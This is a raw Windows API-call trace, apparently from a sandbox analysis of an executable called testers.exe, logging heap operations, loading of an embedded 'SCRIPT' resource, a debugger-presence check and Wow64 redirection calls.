[0245.240] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xc0a680 [0245.251] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053f0 [0245.251] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x8bf9b0 | out: ppstm=0x8bf9b0*=0xc06430) returned 0x0 [0245.252] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0245.252] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0245.252] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0245.252] LockResource (hResData=0x3607b8) returned 0x3607b8 [0245.252] ISequentialStream:RemoteWrite (in: This=0xc06430, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0245.253] IStream:RemoteSeek (in: This=0xc06430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0245.253] IStream:RemoteSeek (in: This=0xc06430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.253] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0xc0a680, cb=0x18, pcbRead=0x8bf8dc | out: pv=0xc0a680*=0xa3, pcbRead=0x8bf8dc*=0x18) returned 0x0 [0245.253] IStream:RemoteSeek (in: This=0xc06430, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0245.253] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf920, cb=0x4, pcbRead=0x8bf8dc | out: pv=0x8bf920*=0x45, pcbRead=0x8bf8dc*=0x4) returned 0x0 [0245.253] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053f0 | out: hHeap=0xbe0000) returned 1 [0245.253] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a680 | out: hHeap=0xbe0000) returned 1 [0245.253] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf944, cb=0x10, pcbRead=0x8bf91c | out: pv=0x8bf944*=0x4d, pcbRead=0x8bf91c*=0x10) returned 0x0 [0245.253] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf818 | out: lpSystemTimeAsFileTime=0x8bf818*(dwLowDateTime=0x33e63e00, dwHighDateTime=0x1d661be)) [0245.253] IStream:RemoteSeek (in: This=0xc06430, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.253] IStream:RemoteSeek (in: This=0xc06430, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0245.253] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf298, cb=0x4, pcbRead=0x8bf05c | out: pv=0x8bf298*=0x6b, pcbRead=0x8bf05c*=0x4) returned 0x0 [0245.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bef58 | out: lpSystemTimeAsFileTime=0x8bef58*(dwLowDateTime=0x33e63e00, dwHighDateTime=0x1d661be)) [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf2a0, cb=0x4, pcbRead=0x8bf05c | out: pv=0x8bf2a0*=0xa6, pcbRead=0x8bf05c*=0x4) returned 0x0 [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf088, cb=0x34, pcbRead=0x8bf05c | out: pv=0x8bf088*=0xe1, pcbRead=0x8bf05c*=0x34) returned 0x0 [0245.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bef58 | out: lpSystemTimeAsFileTime=0x8bef58*(dwLowDateTime=0x33e63e00, dwHighDateTime=0x1d661be)) [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf2a0, cb=0x4, pcbRead=0x8bf05c | out: pv=0x8bf2a0*=0x17, pcbRead=0x8bf05c*=0x4) returned 0x0 [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf2cc, cb=0x6e, pcbRead=0x8bf05c | out: pv=0x8bf2cc*=0xf9, pcbRead=0x8bf05c*=0x6e) returned 0x0 [0245.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bef58 | out: lpSystemTimeAsFileTime=0x8bef58*(dwLowDateTime=0x33e63e00, dwHighDateTime=0x1d661be)) [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf953, cb=0x1, pcbRead=0x8bf2a4 | out: pv=0x8bf953*=0x0, pcbRead=0x8bf2a4*=0x1) returned 0x0 [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf94c, cb=0x4, pcbRead=0x8bf2a4 | out: pv=0x8bf94c*=0xbc, pcbRead=0x8bf2a4*=0x4) returned 0x0 [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf94c, cb=0x4, pcbRead=0x8bf2a4 | out: pv=0x8bf94c*=0xbc, pcbRead=0x8bf2a4*=0x4) returned 0x0 [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0x8bf94c, cb=0x4, pcbRead=0x8bf2a4 | out: pv=0x8bf94c*=0x84, pcbRead=0x8bf2a4*=0x4) returned 0x0 [0245.254] IStream:RemoteSeek (in: This=0xc06430, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.254] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xc053f0 [0245.254] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xc05400 [0245.254] ISequentialStream:RemoteRead (in: This=0xc06430, pv=0xc05400, cb=0x0, pcbRead=0x8bf2a4 | out: pv=0xc05400*=0x6e, pcbRead=0x8bf2a4*=0x0) returned 0x0 [0245.254] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf1a0 | out: lpSystemTimeAsFileTime=0x8bf1a0*(dwLowDateTime=0x33e63e00, dwHighDateTime=0x1d661be)) [0245.254] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053f0 | out: hHeap=0xbe0000) returned 1 [0245.254] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc05400 | out: hHeap=0xbe0000) returned 1 [0245.254] CloseHandle (hObject=0xf8) returned 1 [0245.255] IUnknown:Release (This=0xc06430) returned 0x0 [0245.255] FreeLibrary (hLibModule=0x290000) returned 1 [0245.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf22d0 | out: hHeap=0xbe0000) returned 1 [0245.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053e0 | out: hHeap=0xbe0000) returned 1 [0245.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf3318 | out: hHeap=0xbe0000) returned 1 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc0a680 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3318 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06430 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053e0 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06458 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3348 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05400 [0245.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf3348 | out: hHeap=0xbe0000) returned 1 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc064a8 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3348 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc05870 [0245.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06430 | out: hHeap=0xbe0000) returned 1 [0245.255] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053e0 | out: hHeap=0xbe0000) returned 1 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a6f0 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053e0 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a708 [0245.255] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053f0 [0245.256] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06430 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a720 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05410 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a738 [0245.256] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a6f0 | out: hHeap=0xbe0000) returned 1 [0245.256] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053e0 | out: hHeap=0xbe0000) returned 1 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a6f0 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053e0 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05420 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xc0aad8 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05430 [0245.256] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a750 [0245.256] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a6f0 | out: hHeap=0xbe0000) returned 1 [0245.256] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc053e0 | out: hHeap=0xbe0000) returned 1 [0245.256] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf3318 | out: hHeap=0xbe0000) returned 1 [0245.256] IsDebuggerPresent () returned 0 [0245.256] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x89f968, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0245.256] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x89f968, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0245.277] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a628 | out: hHeap=0xbe0000) returned 1 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x60) returned 0xc0acf8 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3318 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc053e0 [0245.277] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x89f938, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0245.277] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf3318 | out: hHeap=0xbe0000) returned 1 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x60) returned 0xc0ad60 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc064d0 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xbf3318 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc064f8 [0245.277] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05440 [0245.277] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.278] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0245.278] Wow64DisableWow64FsRedirection (in: OldValue=0x8af8d4 | out: OldValue=0x8af8d4*=0x0) returned 1 [0245.278] FreeLibrary (hLibModule=0x75990000) returned 1 [0245.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8af770, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0245.278] GetFileType (hFile=0xf8) returned 0x1 [0245.278] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0245.280] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0245.280] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0245.280] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0245.280] FreeLibrary (hLibModule=0x75990000) returned 1 [0245.280] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xc0adc8 [0245.280] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05450 [0245.280] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x8af904 | out: ppstm=0x8af904*=0xc06520) returned 0x0 [0245.281] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0245.281] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0245.281] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0245.281] LockResource (hResData=0x3607b8) returned 0x3607b8 [0245.281] ISequentialStream:RemoteWrite (in: This=0xc06520, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0245.281] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0245.281] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.281] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0xc0adc8, cb=0x18, pcbRead=0x8af85c | out: pv=0xc0adc8*=0xa3, pcbRead=0x8af85c*=0x18) returned 0x0 [0245.281] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0245.281] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af8a0, cb=0x4, pcbRead=0x8af85c | out: pv=0x8af8a0*=0x45, pcbRead=0x8af85c*=0x4) returned 0x0 [0245.281] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc05450 | out: hHeap=0xbe0000) returned 1 [0245.281] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0adc8 | out: hHeap=0xbe0000) returned 1 [0245.281] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af8c4, cb=0x10, pcbRead=0x8af89c | out: pv=0x8af8c4*=0x4d, pcbRead=0x8af89c*=0x10) returned 0x0 [0245.281] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8af798 | out: lpSystemTimeAsFileTime=0x8af798*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.281] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.281] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0245.281] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af218, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af218*=0x6b, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.281] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8aeed8 | out: lpSystemTimeAsFileTime=0x8aeed8*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af220, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af220*=0xa6, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af008, cb=0x34, pcbRead=0x8aefdc | out: pv=0x8af008*=0xe1, pcbRead=0x8aefdc*=0x34) returned 0x0 [0245.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8aeed8 | out: lpSystemTimeAsFileTime=0x8aeed8*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af220, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af220*=0x17, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af24c, cb=0x6e, pcbRead=0x8aefdc | out: pv=0x8af24c*=0xf9, pcbRead=0x8aefdc*=0x6e) returned 0x0 [0245.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8aeed8 | out: lpSystemTimeAsFileTime=0x8aeed8*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.282] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af210, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af210*=0xbc, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.282] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af218, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af218*=0x6b, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8aeed8 | out: lpSystemTimeAsFileTime=0x8aeed8*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af220, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af220*=0xaf, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af008, cb=0x26, pcbRead=0x8aefdc | out: pv=0x8af008*=0xe6, pcbRead=0x8aefdc*=0x26) returned 0x0 [0245.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8aeed8 | out: lpSystemTimeAsFileTime=0x8aeed8*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af220, cb=0x4, pcbRead=0x8aefdc | out: pv=0x8af220*=0x1b, pcbRead=0x8aefdc*=0x4) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af24c, cb=0x76, pcbRead=0x8aefdc | out: pv=0x8af24c*=0x6b, pcbRead=0x8aefdc*=0x76) returned 0x0 [0245.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8aeed8 | out: lpSystemTimeAsFileTime=0x8aeed8*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af8d3, cb=0x1, pcbRead=0x8af224 | out: pv=0x8af8d3*=0x1, pcbRead=0x8af224*=0x1) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af8cc, cb=0x4, pcbRead=0x8af224 | out: pv=0x8af8cc*=0x86, pcbRead=0x8af224*=0x4) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af8cc, cb=0x4, pcbRead=0x8af224 | out: pv=0x8af8cc*=0xe4, pcbRead=0x8af224*=0x4) returned 0x0 [0245.282] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0x8af8cc, cb=0x4, pcbRead=0x8af224 | out: pv=0x8af8cc*=0x48, pcbRead=0x8af224*=0x4) returned 0x0 [0245.282] IStream:RemoteSeek (in: This=0xc06520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0245.283] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x27c58) returned 0xc241e0 [0245.283] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x923a) returned 0xc0adc8 [0245.283] ISequentialStream:RemoteRead (in: This=0xc06520, pv=0xc0adc8, cb=0x923a, pcbRead=0x8af224 | out: pv=0xc0adc8*=0x6d, pcbRead=0x8af224*=0x923a) returned 0x0 [0245.284] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8af120 | out: lpSystemTimeAsFileTime=0x8af120*(dwLowDateTime=0x33eb00c0, dwHighDateTime=0x1d661be)) [0245.285] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20000) returned 0xc4be40 [0245.286] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xc6be48 [0245.286] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10000) returned 0xc7be50 [0245.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc4be40 | out: hHeap=0xbe0000) returned 1 [0245.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc6be48 | out: hHeap=0xbe0000) returned 1 [0245.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc7be50 | out: hHeap=0xbe0000) returned 1 [0245.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0adc8 | out: hHeap=0xbe0000) returned 1 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x82e4) returned 0xc0adc8 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1c) returned 0xc06570 [0245.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06570 | out: hHeap=0xbe0000) returned 1 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06570 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a6f0 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06598 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a768 [0245.293] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a6f0 | out: hHeap=0xbe0000) returned 1 [0245.293] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa) returned 0xc0a6f0 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a780 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05450 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a780 | out: hHeap=0xbe0000) returned 1 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc05450 | out: hHeap=0xbe0000) returned 1 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a6f0 | out: hHeap=0xbe0000) returned 1 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a6f0 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1e) returned 0xc065c0 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a780 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc065e8 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05450 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc065c0 | out: hHeap=0xbe0000) returned 1 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a798 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a7b0 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a780 | out: hHeap=0xbe0000) returned 1 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a780 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a7c8 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a7e0 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a7f8 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05460 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a7c8 | out: hHeap=0xbe0000) returned 1 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a7c8 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a810 [0245.294] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a7e0 | out: hHeap=0xbe0000) returned 1 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a7e0 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a828 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a840 [0245.294] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a858 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05470 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a828 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a828 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a870 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a840 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a840 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05480 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a888 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a8a0 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc130d0 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc05480 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a8b8 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a8d0 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a888 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xbf22d0 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06570 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a888 